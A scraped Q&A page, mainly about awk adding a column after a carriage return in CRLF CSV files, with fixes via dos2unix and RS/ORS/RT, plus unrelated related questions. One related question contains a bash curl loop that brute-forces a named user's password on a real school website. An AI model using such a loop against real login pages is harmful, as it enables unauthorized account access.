Shell script CSV processing - adding new column with AWK - bash

I have a shell script that processes a CSV file. One step adds a column and fills it with the default value "NULL". The column does get added, but it ends up on the next line instead of at the end of the same line.
Can anyone suggest what is wrong in the code and what causes this unexpected change?
CODE:
awk 'BEGIN{FS=",";OFS=";"} {$(NF+1) = NR==1 ? "NewColm" : "NULL"} 1' source.csv > final.csv
Input CSV:
OldColm1,OldColm2,OldColm3,OldColm4,OldColm5,OldColm6
Value1,Value2,Value3,Value4,Value5,Value6
Output CSV:
OldColm1;OldColm2;OldColm3;OldColm4;OldColm5;OldColm6
;NewColm
Value1;Value2;Value3;Value4;Value5;Value6
;NULL
Expected CSV:
OldColm1;OldColm2;OldColm3;OldColm4;OldColm5;OldColm6;NewColm
Value1;Value2;Value3;Value4;Value5;Value6;NULL

As explained in the comments, this was caused by the lines being separated by \r\n instead of \n.
The od program can be used to illustrate this:
cat source_dos.csv
OldColm1,OldColm2,OldColm3,OldColm4,OldColm5,OldColm6
Value1,Value2,Value3,Value4,Value5,Value6
od -c source_dos.csv
0000000 O l d C o l m 1 , O l d C o l m
0000020 2 , O l d C o l m 3 , O l d C o
0000040 l m 4 , O l d C o l m 5 , O l d
0000060 C o l m 6 \r \n V a l u e 1 , V a
0000100 l u e 2 , V a l u e 3 , V a l u
0000120 e 4 , V a l u e 5 , V a l u e 6
0000140 \r \n
0000142
awk 'BEGIN{FS=",";OFS=";"}
{$(NF+1) = NR==1 ? "NewColm" : "NULL"}
1
' source_dos.csv
;NewColm;OldColm2;OldColm3;OldColm4;OldColm5;OldColm6
;NULL1;Value2;Value3;Value4;Value5;Value6
awk 'BEGIN{FS=",";OFS=";"}
{$(NF+1) = NR==1 ? "NewColm" : "NULL"}
1
' source_dos.csv | od -c
0000000 O l d C o l m 1 ; O l d C o l m
0000020 2 ; O l d C o l m 3 ; O l d C o
0000040 l m 4 ; O l d C o l m 5 ; O l d
0000060 C o l m 6 \r ; N e w C o l m \n V
0000100 a l u e 1 ; V a l u e 2 ; V a l
0000120 u e 3 ; V a l u e 4 ; V a l u e
0000140 5 ; V a l u e 6 \r ; N U L L \n
0000157
A workaround provided in the comments is to convert the input from DOS-like (\r\n) to UNIX-like (\n) line endings:
cp source_dos.csv source_unix.csv && dos2unix source_unix.csv
dos2unix: converting file source_unix.csv to Unix format ...
od -c source_unix.csv
0000000 O l d C o l m 1 , O l d C o l m
0000020 2 , O l d C o l m 3 , O l d C o
0000040 l m 4 , O l d C o l m 5 , O l d
0000060 C o l m 6 \n V a l u e 1 , V a l
0000100 u e 2 , V a l u e 3 , V a l u e
0000120 4 , V a l u e 5 , V a l u e 6 \n
0000140
awk 'BEGIN{FS=",";OFS=";"}
{$(NF+1) = NR==1 ? "NewColm" : "NULL"}
1
' source_unix.csv
OldColm1;OldColm2;OldColm3;OldColm4;OldColm5;OldColm6;NewColm
Value1;Value2;Value3;Value4;Value5;Value6;NULL
awk 'BEGIN{FS=",";OFS=";"}
{$(NF+1) = NR==1 ? "NewColm" : "NULL"}
1
' source_unix.csv | od -c
0000000 O l d C o l m 1 ; O l d C o l m
0000020 2 ; O l d C o l m 3 ; O l d C o
0000040 l m 4 ; O l d C o l m 5 ; O l d
0000060 C o l m 6 ; N e w C o l m \n V a
0000100 l u e 1 ; V a l u e 2 ; V a l u
0000120 e 3 ; V a l u e 4 ; V a l u e 5
0000140 ; V a l u e 6 ; N U L L \n
0000155
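Where dos2unix is not installed, removing the carriage returns inside the pipeline should have the same effect for a file like this one. The following is only a sketch: the helper name strip_cr is made up for illustration, and note that tr deletes every \r in the stream, not only those directly before a \n.

```shell
# Hypothetical helper: delete all carriage returns from stdin.
strip_cr() { tr -d '\r'; }

# Two-column sample input with DOS line endings, fed through the original awk program.
printf 'OldColm1,OldColm2\r\nValue1,Value2\r\n' | strip_cr |
awk 'BEGIN{FS=",";OFS=";"} {$(NF+1) = NR==1 ? "NewColm" : "NULL"} 1'
```

This leaves the source file untouched, which may be preferable when the file has to keep its DOS line endings for other tools.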
An awk-only solution to deal with this would be to adjust the record separator RS accordingly.
RS, as well as its counterpart the output record separator ORS, default to \n.
That's why in the \r\n input case, the \r remains part of the last input column and your new column gets 'stuck' in between this \r and the \n added as ORS.
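A quick way to see the stray \r sitting in the last column is to print the length of the last field. This is a small sketch with made-up two-column input; the function name last_field_lengths is only illustrative.

```shell
# Hypothetical helper: print the length of the last comma-separated field of each line.
last_field_lengths() {
  awk -F, '{ print length($NF) }'
}

# DOS input: the last field is "b\r" or "d\r", so each length is 2.
printf 'a,b\r\nc,d\r\n' | last_field_lengths
# UNIX input: the last field is just "b" or "d", so each length is 1.
printf 'a,b\nc,d\n' | last_field_lengths
```

The extra character counted in the first case is the \r that ends up in front of the newly appended column.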
Changing RS solves this:
awk 'BEGIN{RS="\r\n";FS=",";OFS=";"}
{$(NF+1) = NR==1 ? "NewColm" : "NULL"}
1
' source_dos.csv
OldColm1;OldColm2;OldColm3;OldColm4;OldColm5;OldColm6;NewColm
Value1;Value2;Value3;Value4;Value5;Value6;NULL
Note that this will still create UNIX-like (\n) output:
awk 'BEGIN{RS="\r\n";FS=",";OFS=";"}
{$(NF+1) = NR==1 ? "NewColm" : "NULL"}
1
' source_dos.csv | od -c
0000000 O l d C o l m 1 ; O l d C o l m
0000020 2 ; O l d C o l m 3 ; O l d C o
0000040 l m 4 ; O l d C o l m 5 ; O l d
0000060 C o l m 6 ; N e w C o l m \n V a
0000100 l u e 1 ; V a l u e 2 ; V a l u
0000120 e 3 ; V a l u e 4 ; V a l u e 5
0000140 ; V a l u e 6 ; N U L L \n
0000155
To generate DOS-like (\r\n) output, just adjust ORS, too:
awk 'BEGIN{RS="\r\n";ORS=RS;FS=",";OFS=";"}
{$(NF+1) = NR==1 ? "NewColm" : "NULL"}
1
' source_dos.csv
OldColm1;OldColm2;OldColm3;OldColm4;OldColm5;OldColm6;NewColm
Value1;Value2;Value3;Value4;Value5;Value6;NULL
awk 'BEGIN{RS="\r\n";ORS=RS;FS=",";OFS=";"}
{$(NF+1) = NR==1 ? "NewColm" : "NULL"}
1
' source_dos.csv | od -c
0000000 O l d C o l m 1 ; O l d C o l m
0000020 2 ; O l d C o l m 3 ; O l d C o
0000040 l m 4 ; O l d C o l m 5 ; O l d
0000060 C o l m 6 ; N e w C o l m \r \n V
0000100 a l u e 1 ; V a l u e 2 ; V a l
0000120 u e 3 ; V a l u e 4 ; V a l u e
0000140 5 ; V a l u e 6 ; N U L L \r \n
0000157
Note however that this will fail for UNIX-like (\n) input:
awk 'BEGIN{RS="\r\n";FS=",";OFS=";"}
{$(NF+1) = NR==1 ? "NewColm" : "NULL"}
1
' source_unix.csv
OldColm1;OldColm2;OldColm3;OldColm4;OldColm5;OldColm6
Value1;Value2;Value3;Value4;Value5;Value6
;NewColm
awk 'BEGIN{RS="\r\n";FS=",";OFS=";"}
{$(NF+1) = NR==1 ? "NewColm" : "NULL"}
1
' source_unix.csv | od -c
0000000 O l d C o l m 1 ; O l d C o l m
0000020 2 ; O l d C o l m 3 ; O l d C o
0000040 l m 4 ; O l d C o l m 5 ; O l d
0000060 C o l m 6 \n V a l u e 1 ; V a l
0000100 u e 2 ; V a l u e 3 ; V a l u e
0000120 4 ; V a l u e 5 ; V a l u e 6 \n
0000140 ; N e w C o l m \n
0000151
Why I think this is better than using dos2unix:
Using a regular expression (RE) as RS one can make it work for both \n and \r\n-separated input without the need to know which of the two it is:
awk 'BEGIN{RS="\r?\n";FS=",";OFS=";"}
{$(NF+1) = NR==1 ? "NewColm" : "NULL"}
1
' source_dos.csv
OldColm1;OldColm2;OldColm3;OldColm4;OldColm5;OldColm6;NewColm
Value1;Value2;Value3;Value4;Value5;Value6;NULL
awk 'BEGIN{RS="\r?\n";FS=",";OFS=";"}
{$(NF+1) = NR==1 ? "NewColm" : "NULL"}
1
' source_unix.csv
OldColm1;OldColm2;OldColm3;OldColm4;OldColm5;OldColm6;NewColm
Value1;Value2;Value3;Value4;Value5;Value6;NULL
In both cases, UNIX-like (\n) output will be generated:
awk 'BEGIN{RS="\r?\n";FS=",";OFS=";"}
{$(NF+1) = NR==1 ? "NewColm" : "NULL"}
1
' source_dos.csv | od -c
0000000 O l d C o l m 1 ; O l d C o l m
0000020 2 ; O l d C o l m 3 ; O l d C o
0000040 l m 4 ; O l d C o l m 5 ; O l d
0000060 C o l m 6 ; N e w C o l m \n V a
0000100 l u e 1 ; V a l u e 2 ; V a l u
0000120 e 3 ; V a l u e 4 ; V a l u e 5
0000140 ; V a l u e 6 ; N U L L \n
0000155
awk 'BEGIN{RS="\r?\n";FS=",";OFS=";"}
{$(NF+1) = NR==1 ? "NewColm" : "NULL"}
1
' source_unix.csv | od -c
0000000 O l d C o l m 1 ; O l d C o l m
0000020 2 ; O l d C o l m 3 ; O l d C o
0000040 l m 4 ; O l d C o l m 5 ; O l d
0000060 C o l m 6 ; N e w C o l m \n V a
0000100 l u e 1 ; V a l u e 2 ; V a l u
0000120 e 3 ; V a l u e 4 ; V a l u e 5
0000140 ; V a l u e 6 ; N U L L \n
0000155
To set the output type according to the input type, the ORS can be set per record to the actual text that matched the RS RE, RT:
awk 'BEGIN{RS="\r?\n";FS=",";OFS=";"}
{ORS=RT}
{$(NF+1) = NR==1 ? "NewColm" : "NULL"}
1
' source_dos.csv
OldColm1;OldColm2;OldColm3;OldColm4;OldColm5;OldColm6;NewColm
Value1;Value2;Value3;Value4;Value5;Value6;NULL
awk 'BEGIN{RS="\r?\n";FS=",";OFS=";"}
{ORS=RT}
{$(NF+1) = NR==1 ? "NewColm" : "NULL"}
1
' source_unix.csv
OldColm1;OldColm2;OldColm3;OldColm4;OldColm5;OldColm6;NewColm
Value1;Value2;Value3;Value4;Value5;Value6;NULL
awk 'BEGIN{RS="\r?\n";FS=",";OFS=";"}
{ORS=RT}
{$(NF+1) = NR==1 ? "NewColm" : "NULL"}
1
' source_dos.csv | od -c
0000000 O l d C o l m 1 ; O l d C o l m
0000020 2 ; O l d C o l m 3 ; O l d C o
0000040 l m 4 ; O l d C o l m 5 ; O l d
0000060 C o l m 6 ; N e w C o l m \r \n V
0000100 a l u e 1 ; V a l u e 2 ; V a l
0000120 u e 3 ; V a l u e 4 ; V a l u e
0000140 5 ; V a l u e 6 ; N U L L \r \n
0000157
awk 'BEGIN{RS="\r?\n";FS=",";OFS=";"}
{ORS=RT}
{$(NF+1) = NR==1 ? "NewColm" : "NULL"}
1
' source_unix.csv | od -c
0000000 O l d C o l m 1 ; O l d C o l m
0000020 2 ; O l d C o l m 3 ; O l d C o
0000040 l m 4 ; O l d C o l m 5 ; O l d
0000060 C o l m 6 ; N e w C o l m \n V a
0000100 l u e 1 ; V a l u e 2 ; V a l u
0000120 e 3 ; V a l u e 4 ; V a l u e 5
0000140 ; V a l u e 6 ; N U L L \n
0000155
Note that using an RE as RS as well as the RT built-in variable are GNU awk (gawk) extensions and might not be supported by all awk implementations.
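For awk implementations without these extensions, one possible alternative is to leave RS alone and strip a trailing \r from each record before adding the column. This is a sketch rather than a drop-in replacement: the wrapper name add_column is invented here, and the output always uses UNIX-like (\n) line endings.

```shell
# Hypothetical wrapper around the original program, reading CSV on stdin.
add_column() {
  awk 'BEGIN{FS=",";OFS=";"}
  { sub(/\r$/, "") }                        # drop a trailing CR, if any; $0 is re-split
  {$(NF+1) = NR==1 ? "NewColm" : "NULL"}    # append the new column
  1'
}

# Works the same for both kinds of input.
printf 'OldColm1,OldColm2\r\nValue1,Value2\r\n' | add_column
printf 'OldColm1,OldColm2\nValue1,Value2\n' | add_column
```

Because sub() only removes a \r at the very end of the record, carriage returns elsewhere in a line are left alone.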

Related

Output list items as ls does

I'm trying to output something that resembles the output of ls. The ls command outputs like this:
file1.txt file3.txt file5.txt
file2.txt file4.txt
But I want this sample list:
a b c d e f g h i j k l m n o p q r s t u v w x y z
to appear as:
a e i m q u y
b f j n r v z
c g k o s w
d h l p t x
In that case, it gave 7 columns which is fine, but I wanted up to 8 columns max. Next the following list:
a b c d e f g h i j k l m n o p q r s t u v w
will have to show as:
a d g j m p s v
b e h k n q t w
c f i l o r u
And "a b c d e f g h" will have to show as is because it is already 8 columns in 1 line, but:
a b c d e f g h i
will show as:
a c e g i
b d f h
And:
a b c d e f g h i j
will show as:
a c e g i
b d f h j
One way:
#!/usr/bin/env tclsh
proc columnize {lst {columns 8}} {
    set len [llength $lst]
    set nrows [expr {int(ceil($len / (0.0 + $columns)))}]
    set cols [list]
    for {set n 0} {$n < $len} {incr n $nrows} {
        lappend cols [lrange $lst $n [expr {$n + $nrows - 1}]]
    }
    for {set n 0} {$n < $nrows} {incr n} {
        set row [list]
        foreach col $cols {
            lappend row [lindex $col $n]
        }
        puts [join $row " "]
    }
}
columnize {a b c d e f g h i j k l m n o p q r s t u v w x y z}
puts ----
columnize {a b c d e f g h}
puts ----
columnize {a b c d e f g h i j k l m n o p q r s t u v w}
puts ----
columnize {a b c d e f g h i}
puts ----
columnize {a b c d e f g h i j}
The columnize function first figures out how many rows are needed with a simple division of the length of the list by the number of columns requested, then splits the list up into chunks of that length, one per column, and finally iterates through those sublists extracting the current row's element for each column, and prints the row out as a space-separated list.
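For readers without tclsh, the same row and column arithmetic can be sketched with awk from a shell. This is an illustrative translation, not part of the original answer: the shell function reuses the name columnize, takes the maximum column count as an assumed first argument, reads whitespace-separated items from stdin, and, unlike the Tcl version, does not emit a trailing space on short rows.

```shell
# Hypothetical shell counterpart of the Tcl proc; $1 is the maximum number of columns.
columnize() {
  awk -v columns="${1:-8}" '
    { for (i = 1; i <= NF; i++) item[++len] = $i }    # collect all items
    END {
      nrows = int((len + columns - 1) / columns)      # ceil(len / columns)
      for (r = 1; r <= nrows; r++) {
        line = ""
        # row r holds items r, r+nrows, r+2*nrows, ... (column-major order)
        for (n = r; n <= len; n += nrows)
          line = line (n > r ? " " : "") item[n]
        print line
      }
    }'
}

echo a b c d e f g h i | columnize 8
```

With nine items and at most eight columns, two rows are needed, so the items are laid out in five columns of up to two entries each.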

What are the inorder and postorder traversals of the following tree?

With respect to the following tree:
1. What is the correct inorder traversal?
   1. U S T X C P Y R B A I G J F N H V T E D L
   2. U S T X C P Y R B A D E I G J F N H V T L
2. What is the correct postorder traversal?
   1. U T S X P R Y C B D I J G N V T H F E L A
   2. U T S X P R Y C B I J G N V T H F E D L A
I evaluated both pairs. But some are saying 1-1 and 2-1 are correct, while others say 1-2 and 2-2 are correct. I'm confused. Which ones are actually correct?
inorder:
B U S T X C P Y R A D E I G J F N H V T L
postorder (2.2 is correct):
U T S X P R Y C B I J G N V T H F E D L A

Brute force my online account password using bash script

I want to brute-force the password of my account on the https://app.shkolo.bg/ website, but I am having difficulty logging in to the website. My username is DonchoBonboncho and the password is 8 digits long. My code looks like this:
#!/bin/bash
curl --cookie-jar cjar --output /dev/null http://app.shkolo.bg/
for a in A B C D E F G H I K L M N O R S T U W X Y a b c d e f g h i j k l m n o p q r s t u v w x y z 0 1 2 3 4 5 6 7 8 9 \- \_ \+ \!;
do for b in A B C D E F G H I K L M N O R S T U W X Y a b c d e f g h i j k l m n o p q r s t u v w x y z 0 1 2 3 4 5 6 7 8 9 \- \_ \+ \!;
do for c in A B C D E F G H I K L M N O R S T U W X Y a b c d e f g h i j k l m n o p q r s t u v w x y z 0 1 2 3 4 5 6 7 8 9 \- \_ \+ \!;
do for d in A B C D E F G H I K L M N O R S T U W X Y a b c d e f g h i j k l m n o p q r s t u v w x y z 0 1 2 3 4 5 6 7 8 9 \- \_ \+ \!;
do for e in A B C D E F G H I K L M N O R S T U W X Y a b c d e f g h i j k l m n o p q r s t u v w x y z 0 1 2 3 4 5 6 7 8 9 \- \_ \+ \!;
do for f in A B C D E F G H I K L M N O R S T U W X Y a b c d e f g h i j k l m n o p q r s t u v w x y z 0 1 2 3 4 5 6 7 8 9 \- \_ \+ \!;
do for g in A B C D E F G H I K L M N O R S T U W X Y a b c d e f g h i j k l m n o p q r s t u v w x y z 0 1 2 3 4 5 6 7 8 9 \- \_ \+ \!;
do for h in A B C D E F G H I K L M N O R S T U W X Y a b c d e f g h i j k l m n o p q r s t u v w x y z 0 1 2 3 4 5 6 7 8 9 \- \_ \+ \!;
do
echo $a$b$c$d$e$f$g$h;
curl --cookie cjar --cookie-jar cjar \
--data 'username=DonchoBonboncho' \
--data 'password="$a$b$c$d$e$f$g$h"' \
--data 'form_id=user_login' \
--data 'op=Log in' \
--location \
--output ~/loginresult.html \
http://app.shkolo.bg/
done;
done;
done;
done;
done;
done;
done;
done;
I'm not sure about the website login part and need help with it.
It doesn't give me any errors or warnings, but surprisingly it accepts the first password (it logs in to the website) and does not continue.

Exponents are not getting added

I am a beginner in Mathematica and am learning from Google.
I was trying to find the determinant of a 4×4 matrix.
TT = {{ap, b, c, d}, {e, fp, g, h}, {i, j, kp, l}, {m, n, o, pq}}
TT // MatrixForm
After that, I applied the determinant command.
Det[TT]
I get the following result:
d g j m - c h j m - d fp kp m + b h kp m + c fp l m - b g l m - d g i n + c h i n + d e kp n - ap h kp n - c e l n + ap g l n + d fp i o - b h i o - d e j o + ap h j o + b e l o - ap fp l o - c fp i pq + b g i pq + c e j pq - ap g j pq - b e kp pq + ap fp kp pq
I want the above expression as a polynomial in p, with the coefficients collected separately. I have tried various commands such as Collect and Factor, but each time I get the same polynomial as above.
I assume you mean a*p, f*p, k*p and p*q instead of ap, fp, kp and pq.
Mathematica needs either a space or a multiplication sign between the symbols to treat them as separate factors rather than as a single variable name.
t = {{a p, b, c, d}, {e, f p, g, h}, {i, j, k p, l}, {m, n, o, p q}};
Collect[Det[t], p]
(* d g j m - c h j m - b g l m - d g i n + c h i n - c e l n -
b h i o - d e j o + b e l o + a f k p^4 q +
p (b h k m + c f l m + d e k n + a g l n + d f i o + a h j o +
b g i q + c e j q) +
p^2 (-d f k m - a h k n - a f l o - c f i q - a g j q - b e k q) *)

Getting 3 characters before and after each character using awk

The output I expect is like this:
[Before character h there is nothing, so '#' is assigned. After character h are "e","l","l".]
[Before character e is "h". After character e are "l","l","o".]
[Before character l are "h" and "e". After character l are "l" and "o".]
[Before character l are "h","e","l". After character l is "o".]
[Before character o are "e","l","l". After character o there is nothing, so '#' is assigned.]
# # # h e l l
# # h e l l o
# h e l l o #
h e l l o # #
e l l o # # #
# # # w o n d
# # w o n d e
# w o n d e r
w o n d e r f
o n d e r f u
n d e r f u l
d e r f u l #
e r f u l # #
r f u l # # #
Input file:
h e l l o
w o n d e r f u l
Code:
awk -v s1="# # #" 'BEGIN{v=length(s1)}
{$0=s1 $0 s1;num=split($0, A,"");
  for(i=v+1;i<=num-v;i++){
    q=i-v;p=i+v;
    while(q<=p){
      Q=Q?Q OFS A[q]:A[q];q++
    };
    print Q;Q=""
  }
}' InputFile
But the result I got is:
# # # h e l
# # h e l l
# # h e l l
# h e l l o
# h e l l o #
h e l l o #
e l l o # #
e l l o # #
l l o # # #
# # # w o n
# # w o n d
# # w o n d
# w o n d e
# w o n d e
w o n d e r
o n d e r
o n d e r f
n d e r f
n d e r f u
d e r f u
d e r f u l
e r f u l #
e r f u l #
r f u l # #
r f u l # #
f u l # # #
How to solve it? Please guide me. Thanks
Add gsub(/ /,"") to the top of @fedorqui's answer to your previous question, change ## to ### and change 5 to 7, and you get:
$ cat tst.awk
{
    gsub(/ /,"")
    n=length($0)
    $0 = "###" $0 "###"
    gsub(/./, "& ")
    for (i=1; i<=2*n; i+=2)
        print substr($0, i, 7*2-1)
    print ""
}
$ awk -f tst.awk file
# # # h e l l
# # h e l l o
# h e l l o #
h e l l o # #
e l l o # # #
# # # w o n d
# # w o n d e
# w o n d e r
w o n d e r f
o n d e r f u
n d e r f u l
d e r f u l #
e r f u l # #
r f u l # # #
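The two constants in the script are tied together: the padding is as long as the number of context characters on each side, and the window is twice that plus one. A parametrized variant might look like the sketch below; the function name window and its argument w are assumptions made here for illustration, and it prints no blank line between input lines.

```shell
# Hypothetical helper: $1 is the number of context characters on each side (default 3).
window() {
  awk -v w="${1:-3}" '
  {
    gsub(/ /, "")                                        # drop the spaces between characters
    n = length($0)
    pad = sprintf("%" w "s", ""); gsub(/ /, "#", pad)    # w copies of "#"
    s = pad $0 pad
    for (i = 1; i <= n; i++) {
      win = substr(s, i, 2 * w + 1)                      # w before + the character + w after
      gsub(/./, "& ", win); sub(/ $/, "", win)           # re-insert single spaces
      print win
    }
  }'
}

printf 'h e l l o\n' | window 3
```

With w set to 3 this should reproduce the five lines shown for "h e l l o" above; other values of w change both the padding and the window width consistently.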
